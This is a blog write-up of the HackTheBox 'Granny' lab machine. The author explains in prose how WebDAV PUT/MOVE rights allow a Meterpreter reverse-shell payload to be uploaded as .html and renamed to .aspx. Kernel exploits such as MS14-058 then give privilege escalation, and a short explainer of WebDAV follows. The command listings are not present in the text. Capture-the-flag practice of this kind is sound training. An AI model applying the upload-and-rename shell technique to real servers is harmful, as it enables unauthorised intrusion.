Haxilio.com

My journey on becoming a hacker

Granny Hackthebox-WriteUp

Introduction

Christmas is time for the family. Therefore, today we’re doing Granny and Grandpa, both from hackthebox. This is a pretty easy box – except for when you get stuck in a rabbit-hole for hours. Let’s pretend no one does that …

Write-Up

As always, only take a peek, if you really have to 😉

Here is what we’ll do:

 

Walkthrough

Since this is a pretty straight-forward box, I’ll keep explanations short this time and focus on the box itself.

Enumeration

First of all, as always we nmap the box to learn about our attack-surface:

Looks like there is WebDAV running. In case you don’t know what that is, I didn’t either before cracking this box. In my explanatory part at the end of this post I’ll give you some more details about what that is.

Assuming the scan is right, that would mean, that we could upload (PUT) and MOVE files to the server. That seems like an easy win. To confirm that we run davtest:

Vulnerability confirmed! We can upload html and txt files. Uploading a reverse-shell as .html or .txt wouldn’t do us any good though. It would be displayed but not executed. But remember, we have the MOVE right as well. Let’s try to upload the shell as .html and move it’s file name to _____.aspx afterwards.

Gaining a Foothold

First, let’s create the payload:

We want the reverse shell to open a meterpreter session for windows via tcp to 10.10.14.8 (my host, probably different for you) on port 1337 (which else could it be?). The file type will be aspx but stored as html.

Secondly, we upload and rename the file with cadaver:

Success! Now you can just start metasploit and open the listener for the metasploit session (multi/handler). After visiting http://10.10.10.15 with your browser the shell should pop. We’re in!

Privilige Escalation

This step is even quicker than gaining the initial access. We background our meterpreter-session in metasploit, run the exploit suggester and get a couple of options. Luckily, my first try was a hit:

Just configure the script’s options, run the script and ….

Aaaand we’re root. Congratulations!

If you don’t want to use metasploit, you can just go ahead and change the payload to a tcp-reverse-shell with a netcat-listener. Enumerating the machine manually will yield that the box is vulnerable to MS14-058. You can just download that and upload it via webdav (as .txt, rename it afterwards). That’s actually where I fell into the rabbit-hole… I tried downloading the file with the user on the box who has no rights. Then, I enumerated everything but couldn’t find a way to download a file. WebDAV was TOO obvious, I guess.

Anyways, for those of you, who – like me – didn’t know WebDAV before, keep on reading. If you’re already familiar with it: Happy Hacking!

 

WebDAV Explanation

Personally, I didn’t know about WebDAV before doing this box. I’ll account this lack of knowledge for the hours, that I sank into the rabbit-hole.

WebDAV stands for Web Distributed Authoring and Versioning and is defined in an RFC. The RFC defines WebDAV as “an extension to the HTTP/1.1 protocol that allows clients to perform remote Web content authoring operations.”. To me that sounds like the pre-pre-pre-predecessor to WordPress with a touch of FTP. Like a really basic, hard-to-manage Content-Management-/File-Transfer-and-Modification-System.

What you, as a hacker, should keep in mind is, that it gives you the opportunity to remotely read and tamper with the files hosted on a server. This might leak sensitive information or give you an easy way to drop a reverse-shell onto the server – like in the example above.

Other than that webDAV can be used to group files into folders and manage metadata like authors on a given file. The main difference to FTP – as it seems to me – is that you can modify the files on the server without the need to download them beforehand.

I suppose, that you’re not going to get in touch with WebDAV a lot anymore. At least I haven’t seen it out in the wild yet. In case you know, why WebDAV is still in bigger use, please tell me 🙂

That’ll be it for today. If you like what you read, or have any feedback, please let me know @h4xil10.

 

Happy Hacking!

 

Share on facebook
Share on twitter
Share on linkedin

Related Articles

H4xil10

Content creator

Become a hacker they said… It’ll be fun they said … AND IT ACTUALLY IS. Even better so than I thought it might be. Therefore, I want to make my learnings and knowledge as accessible as possible and hope many will join me on a journey into the great world of itsec.

haxilio

Explore